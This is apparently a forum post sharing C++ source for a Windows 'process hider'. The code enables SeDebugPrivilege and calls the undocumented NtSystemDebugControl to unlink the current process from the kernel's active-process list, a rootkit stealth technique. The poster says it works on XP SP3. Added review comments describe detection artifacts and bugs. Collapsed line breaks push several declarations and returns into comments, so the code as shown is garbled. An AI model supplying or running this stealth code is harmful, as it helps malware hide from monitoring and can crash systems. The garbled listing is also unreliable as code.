
Windows Process Hider


JMC31337


in no way is this my code at all:


I simply added/modified 2 lines to make it work correctly with Dev-C++


 


1) LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);


2) *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");



#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <shlwapi.h>
#include <iostream>
using namespace std;
typedef LONG NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
// NOTE(review): this paste has collapsed line breaks throughout; several directives and statements
// now share a line with other code or sit inside trailing comments (a #define must start its own line).
//ivanlef0u's code
//xp sp2 ntoskrnl 5.1.2600, the numbers indicate the size of the struct to pass as argument
// Request codes for the undocumented NtSystemDebugControl system call. Only DebugSysReadVirtual (8)
// and DebugSysWriteVirtual (9) are used by HideCurrentProcess in this listing.
typedef enum _DEBUG_CONTROL_CODE {
DebugSysGetTraceInformation=1,
DebugSysSetInternalBreakpoint, //0x38
DebugSysSetSpecialCall, //0x4
DebugSysClerSpecialCalls, //no args kill all special calls
DebugSysQuerySpecialCalls,
DebugSysBreakpointWithStatus,
DebugSysGetVersion, //0x28 //ReactOS sources, written by our favourite Alex Ionescu, ntexapi.h
DebugSysReadVirtual = 8, //0x10
DebugSysWriteVirtual = 9,
DebugSysReadPhysical = 10,
DebugSysWritePhysical = 11, DebugSysReadControlSpace=12, //0x18
DebugSysWriteControlSpace, //0x18
DebugSysReadIoSpace, //0x20
DebugSysSysWriteIoSpace, //0x20
DebugSysReadMsr, //0x10
DebugSysWriteMsr, //0x10
DebugSysReadBusData, //0x18
DebugSysWriteBusData, //0x18
DebugSysCheckLowMemory,
} DEBUG_CONTROL_CODE; typedef struct _SYSDBG_VIRTUAL {
// Argument block for DebugSysReadVirtual / DebugSysWriteVirtual as used below:
// Address is the kernel-mode address, Buffer the user-mode buffer, Request the byte count
// (the caller sets it to sizeof(ULONG) for every request in this listing).
PVOID Address;
PVOID Buffer;
ULONG Request;
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; extern "C"
__declspec(dllimport)
ULONG
__stdcall
RtlNtStatusToDosError(
NTSTATUS Status
); // declared but never called in this listing
#define PKPCR 0xffdff000 // <=> fs:[0] in KeLand //FUNCTIONS:
// NOTE(review): PKPCR is a fixed address assumed for the 32-bit KPCR; it is not derived at runtime,
// so everything built on it is specific to the kernel build and architecture the author targeted.
// Function pointer filled in by HideCurrentProcess through GetProcAddress(LoadLibrary("ntdll"), ...).
// From a monitoring point of view that by-name resolution is the first user-mode artifact of this code.
LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);
//Check OS and get the right Offset:
int CheckOSVersion( int &Offset )
/// Picks the EPROCESS list-link offset that HideCurrentProcess will use, based on the running OS version.
/// @param Offset  out: 0x88 for NT 5.1 (XP), 0xA0 for NT 5.0 (2000) and NT 6.0 (Vista)
/// @return 1 for the 5.0 and 6.0 branches, 0 for any other version. As displayed, the 5.1 branch's
///         `return 1;` sits inside the trailing `//WinXP` comment (collapsed line break), so that
///         branch falls through to the final `return 0`.
/// NOTE(review): only platform/major/minor are compared; service pack and build number are ignored,
/// so the hardcoded offsets are never validated against the kernel that is actually running.
{
//xWeasel's Code for checking OS's and setting the right Offset OSVERSIONINFO osvi; ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
// NOTE(review): the `OSVERSIONINFO osvi;` declaration and the ZeroMemory call were pulled into the
// comment above by the collapsed line break; `osvi` is otherwise undeclared in this listing.
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1)
{
Offset = 0x88; //WinXP return 1;
}
else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0)
{
Offset = 0xA0; //Win2000
return 1;
}
else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0)
{
Offset = 0xA0; //VISTA
return 1;
}
else
{
return 0;
}
return 0; // unreachable: every branch above returns, except the 5.1 branch as displayed
} ULONG EnablePrivilege(char *Privilege)
/// Enables one named privilege on the current process token (the caller passes "SeDebugPrivilege").
/// @param Privilege  privilege name handed to LookupPrivilegeValue
/// @return 1 when OpenProcessToken, LookupPrivilegeValue and AdjustTokenPrivileges all succeed, else 0
/// NOTE(review): AdjustTokenPrivileges can return TRUE without granting the privilege (GetLastError
/// then reports ERROR_NOT_ALL_ASSIGNED); that case is not distinguished here, so a return of 1 does
/// not prove the privilege is held. From an auditing standpoint, a process enabling SeDebugPrivilege
/// is the observable precondition for everything HideCurrentProcess does afterwards.
{
HANDLE hToken; // NOTE(review): left uninitialized when OpenProcessToken fails, yet CloseHandle(hToken) still runs at bye
ULONG Ret=1;
TOKEN_PRIVILEGES TP;
LUID Luid; if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) // Luid is never used
{
Ret=0;
goto bye;
} if(!LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid))
{
Ret=0;
goto bye; } TP.PrivilegeCount=1;
TP.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken,
false,
&TP,
NULL,
NULL,
NULL))
{
Ret=0;
goto bye; } bye:
CloseHandle(hToken); return Ret; // single exit: token handle closed on every path
} int HideCurrentProcess( int Offset )
/// Unlinks the calling process's entry from the kernel's ActiveProcessLinks list (DKOM) using the
/// read-virtual / write-virtual requests of NtSystemDebugControl, so enumeration that walks that
/// list is expected to skip it. Only the two neighbouring list pointers are modified; the process
/// object, its threads and handles are left untouched.
/// @param Offset  EPROCESS offset of ActiveProcessLinks (Flink) for the detected OS, from CheckOSVersion
/// @return 1 when every read/write returned STATUS_SUCCESS, 0 on the first failure
/// Preconditions visible here: SeDebugPrivilege must be enabled, and the running kernel must still
/// honour DebugSysReadVirtual/DebugSysWriteVirtual for this caller.
/// Defender notes: the user-mode artifacts are the SeDebugPrivilege enable and the by-name lookup of
/// "NtSystemDebugControl" in ntdll; because only list links change, comparing several independent
/// process-enumeration sources reveals the missing entry. Writing kernel memory with offsets that do
/// not match the running build corrupts the kernel (bugcheck) rather than failing cleanly.
{
*(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");
// NOTE(review): the GetProcAddress result is not checked for NULL, and the DWORD cast assumes 32-bit pointers.
ULONG Status, Addr, PrevEPROCESS, NextEPROCESS;
// Addr: the kernel pointer read back by each step. PrevEPROCESS/NextEPROCESS hold the Blink/Flink
// values of this process's list entry; as used below they are list-entry addresses, not EPROCESS bases.
SYSDBG_VIRTUAL Mem; if(!EnablePrivilege("SeDebugPrivilege"))
{
return 0;
} /**************** CURRENT ETHREAD ****************/
Mem.Address=(PVOID)(PKPCR+0x124); //KPRRCB-> +0x004 CurrentThread : Ptr32 _KTHREAD
Mem.Buffer=&Addr;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** CURRENT EPROCESS ****************/
Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS
Mem.Buffer=&Addr;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** PREV EPROCESS ****************/
Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
// NOTE(review): this read uses a hardcoded 0x8C while the next one uses Offset; the two only agree when Offset is 0x88.
Mem.Buffer=&PrevEPROCESS;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** NEXT EPROCESS ****************/
Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
Mem.Buffer=&NextEPROCESS;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** PREV EPROCESS TO NEXT EPROCESS ****************/
// First kernel write: the previous entry's forward link is pointed past this process.
Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
Mem.Buffer=&NextEPROCESS;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** NEXT EPROCESS TO PREV EPROCESS ****************/
// Second kernel write: the next entry's back link is pointed past this process. If this write fails
// after the first succeeded the list is left half-unlinked; nothing here rolls the first write back.
Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
Mem.Buffer=&PrevEPROCESS;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} return 1; //SUCCED Stuff is hidden!!
} //MAIN FUNCTION int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
// Entry point as posted: show a message box, pick the offset via CheckOSVersion, call
// HideCurrentProcess, show a second message box, exit. In this paste the WinMain signature, the
// `int Offset;` declaration, the `if ( CheckOSVersion(Offset) == 1)` test and the if's closing brace
// all sit inside trailing comments because line breaks were collapsed.
// NOTE(review): HideCurrentProcess's return value is ignored, so the "Check if I'm hidden" box is
// shown even when the unlink failed.
{
MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG int Offset; if ( CheckOSVersion(Offset) == 1)
{
HideCurrentProcess(Offset);//OK to hide
MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG } return 0;
}

the original idea was by a bad @ss hacker ivanlef0u 


http://www.ivanlef0u.tuxfamily.org/


 


--Currently works under SP3

